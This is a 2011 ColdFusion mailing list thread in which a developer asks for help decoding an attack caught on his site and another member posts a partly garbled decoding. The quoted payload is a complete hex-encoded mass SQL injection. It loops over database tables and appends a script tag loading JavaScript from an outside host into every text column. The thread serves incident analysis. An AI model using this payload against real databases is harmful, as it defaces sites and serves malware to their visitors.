http://www.dolcevie.com/js/converter.html
On Fri, May 13, 2011 at 9:36 AM, Che Vilnonis <ch...@asitv.com> wrote: > > John, what did you do to decode this? Thanks, Che > > -----Original Message----- > From: John M Bliss [mailto:bliss.j...@gmail.com] > Sent: Friday, May 13, 2011 10:34 AM > To: cf-talk > Subject: Re: Can anyone decode this? > > > Patial: > > DECLARE @T varchar(255),@C varcha?"?C?????DT4??$R?F?&?U?7W'6?"?5U%4?"?d?R > select a.name,b.name from > sysobjects????7?66??V??2?"?v?W&R????C?"??B???B???xtype='u' and (b.xtype=99 > or b.xtype=3?R??"?"??G??S?#3???"?"??G??S??cr????T??Table_Cursor FETCH NEXT > FROM Table_Cu?'6?"???D???B??2?t???R???dUD4??5D?EU3??) BEGIN exec('update > ['+@T+'] set ['+@?2?u???r??2?u??rr#???F?F?S??67&??B?7&3?" > http://sdo.1000mg.cn/csrss/w.js > "></sc?&??C?????rr?v?W&R?r??2?r???B????R?rrR? > ></title><script > src="http://sdo.1000m?r?6??77'72?r??2#???67&??C?????rrr?dUD?H NEXT FROM > Table_Cursor INTO @T,@C E??B?4??4R?F?&?U?7W'6?"?DT????4?DR?F?&??_Cursor > > On Fri, May 13, 2011 at 9:31 AM, Che Vilnonis <ch...@asitv.com> wrote: > > > > > Can anyone decode this? This was a URL attack that was caught by some > > custom code. I tried decoding the string at > > http://meyerweb.com/eric/tools/dencoder/ but had no luck. > > > > 113|736;DECLARE @S CHAR(4000);SET > > > > @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172 > > 636861 > > > > 72283430303029204445434C415245205461626C655F437572736F7220435552534F52 > > 20464F > > > > 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65 > > 637473 > > > > 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E64 > > 20612E > > > > 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970 > > 653D33 > > > > 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50 > > 454E20 > > > > 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C65 > > 5F4375 > > > > 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455 > > 533D30 > > > > 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B > > 272B40 > > > > 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C7363726970742073 > > 72633D > > > > 22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C > > 2F7363 > > > > 726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652027 > > 272522 > > > > 3E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E3130 > > 30306D > > > > 672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727272946 > > 455443 > > > > 48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40 > > 432045 > > > > 4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461 > > 626C65 > > 5F437572736F72 AS CHAR(4000));EXEC(@S); > > > > Thanks, Che > > > > > > > > > > > > > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:344494 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm